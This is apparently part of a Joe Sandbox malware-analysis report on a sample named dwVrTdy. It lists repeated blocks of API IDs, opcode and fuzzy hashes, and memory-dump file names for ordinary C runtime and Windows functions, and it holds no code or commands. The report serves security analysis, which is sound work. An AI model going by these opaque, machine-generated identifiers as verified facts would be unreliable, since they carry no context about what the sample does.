                                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                          • Opcode ID: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
                                                                                                                                                                                                                                                                                          • Instruction ID: 5873a49c98f13a53c6af08ec0cfbd1a2f5652b664d4d5cacfc9f464e8a1d36b8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDF04F61A1DB42C1EA90BF24E4467796330BF89B61F941239CA6D9B2F4DF2CD449A700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
                                                                                                                                                                                                                                                                                          • Instruction ID: c50a8ddf71d309ea37ec954a241343ba57ecc8fe2fc93c807502c90054bb43b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09B1E421A0EA4281EAE5FF1194526796390AF64F84F18A435DE4EB77C6DF3CF443AB40
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 262959230-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a41ae39b44eb095044cb99d6d411043c580d0bcf5211e788468cf883008e4936
                                                                                                                                                                                                                                                                                          • Instruction ID: fa12482c7ab272fa5cb2163507d8f05f2e59517fb9047fac9f4849294a8cb236
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a41ae39b44eb095044cb99d6d411043c580d0bcf5211e788468cf883008e4936
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B411821A0C7469AEBE4BFA1D4627782290EF44BA4F146634ED6DE77E5DF3CD4829300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                          • Opcode ID: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
                                                                                                                                                                                                                                                                                          • Instruction ID: e015b39e54820087b136d6ca0b791e0e94b9a4bcb3fd75764653d63c5e676c08
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF118F23E1CA1312F6D831A9E48337592616F64374F450736EAAEB72DACF2CA840A110
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F771E3
                                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F77202
                                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F7722A
                                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F7723B
                                                                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF643F6C9D3,?,?,00000000,00007FF643F6CC6E,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F7724C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f35424abd28038474a29b95bfeff797059f55abd19cfba0c666cbc8005d469a5
                                                                                                                                                                                                                                                                                          • Instruction ID: a0a21d9c8537de6bf93688ecf55c1a2481548b6ef87f5773b0a6135ed37f1260
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f35424abd28038474a29b95bfeff797059f55abd19cfba0c666cbc8005d469a5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82118B20F1EB4241FAD8B725A55317A61425F54BB0F844738E83DFBBCADF6CE485A600
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4263036b582548b7958096a9d1bffdf656f94b1191ee60feb7a57038dce2b1f3
                                                                                                                                                                                                                                                                                          • Instruction ID: dfb60210c29031a0869df45d9b8dc9ac7821d1118d5734df17ac2be479f1fc2e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4263036b582548b7958096a9d1bffdf656f94b1191ee60feb7a57038dce2b1f3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6110520A1E64346FAE8B32598674B911424F54770F580B38E93EEB2E6DF6DF486B211
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: b132b125278c632f91b0463666795c4ad9e361d8f037111066a4675e2791e404
                                                                                                                                                                                                                                                                                          • Instruction ID: aa0d886845725a7ca721f6c1648c63057fed493cc99c6293eda4ad2abb4da75e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b132b125278c632f91b0463666795c4ad9e361d8f037111066a4675e2791e404
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11D1A662E0CA5280EB90FF65D4462AC23A1FB15BD8F149136DD1EB76DADF38D881E350
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                          • Opcode ID: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
                                                                                                                                                                                                                                                                                          • Instruction ID: 9924c005f92b8a26c6ce6ee18037a0e55afd81132ee0c31d5601a9bcd63aa745
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B681D072E1C20285FBE4BF29C15267A2AA1EB11B48F558035DA4DF7AD4DF2DE842B311
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                          • Opcode ID: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
                                                                                                                                                                                                                                                                                          • Instruction ID: f0aa9d7f59109e65e3c7cb8e4c8c11b00c51a3b337ff476a2f379507ec3c2ca7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E81DE72E0C24385FBE87E2D965627A2AD0AF13748F555035CA0EE3ED9DF2DA941B301
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                          • Opcode ID: 256b27d133a9fd6dcb879e39cf91acb48b1b141aab8914266f1ba43c76c4a0d2
                                                                                                                                                                                                                                                                                          • Instruction ID: 777bcae31b05b83cdc706405aee56ee639d55ad95217bbe4ded71ae4be33a9a1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 256b27d133a9fd6dcb879e39cf91acb48b1b141aab8914266f1ba43c76c4a0d2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB91C373A087818AE750EB64E4512AC7BB0F744788F10513AEE8DA7795DF3CD596DB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                                                                                                                                                                          • String ID: assert json failed$in Json::Value::setComment(): Comments must start with /
                                                                                                                                                                                                                                                                                          • API String ID: 1944019136-3359747093
                                                                                                                                                                                                                                                                                          • Opcode ID: eaa275e36fc8740e3ab67c74447eb186e29681fa32f73f9bf3f495bad34426d8
                                                                                                                                                                                                                                                                                          • Instruction ID: 92f564955106b1759d463fe8b0a8511516b6ddf6076c222c8a53952f5bd1ce58
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eaa275e36fc8740e3ab67c74447eb186e29681fa32f73f9bf3f495bad34426d8
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F61B222E1CB8292EA94FB11E5513BA6361FB95780F40A131EA5D97BD2DF7CE5909300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                                          • Opcode ID: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
                                                                                                                                                                                                                                                                                          • Instruction ID: 9efa84d881758f7359b35182ab94620d043ca95acd6a6eaffd506d8453d96fa7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51BC32B0DA028ADB94FF15E445A383795EB44B98F609134EA4A937C8DF7DE842E700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                          • Opcode ID: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
                                                                                                                                                                                                                                                                                          • Instruction ID: 32345a96912f1ecab7e83af02911ff1c6cc01bdd507f71d1b22f0fe8bf3f7ba3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D61913290CBC581EBA0AF15E4423AAB7A0FB85B84F045235EB9D53B95DF3CD095CB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                          • Opcode ID: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
                                                                                                                                                                                                                                                                                          • Instruction ID: 38afd93c6903bf77e7a2e9d4849597f6751d5c696445f8b1389afb6c86f0b795
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E751A232A0C282C6FBB4BF11954536877A0EB55B94F14A239DA5CA7BD5CF3CE452D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                                                                          • API String ID: 2775327233-1405518554
                                                                                                                                                                                                                                                                                          • Opcode ID: db4bce26198b54ce531c376d77e15760e6518d1566bbb4eecdd7fd0827ca7ab9
                                                                                                                                                                                                                                                                                          • Instruction ID: 7e3429f3ae6278b81fdd2a9a1bbb7e147b1bd471592d7a84ce8fe2874971d8fd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db4bce26198b54ce531c376d77e15760e6518d1566bbb4eecdd7fd0827ca7ab9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C416E22B0EA41D9FBA4FF71D4922BC2364EF54748F084034DE4DB7AA6DE38D556A308
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-1866435925
                                                                                                                                                                                                                                                                                          • Opcode ID: 6f497c1ce9e5e04c61fb24ff877b0b05fda8846542b56cd27f43f2303514b95d
                                                                                                                                                                                                                                                                                          • Instruction ID: ec2385233b2568ed970cbf0c94a4ee7e122cee709f6b26f838de9945f72079b9
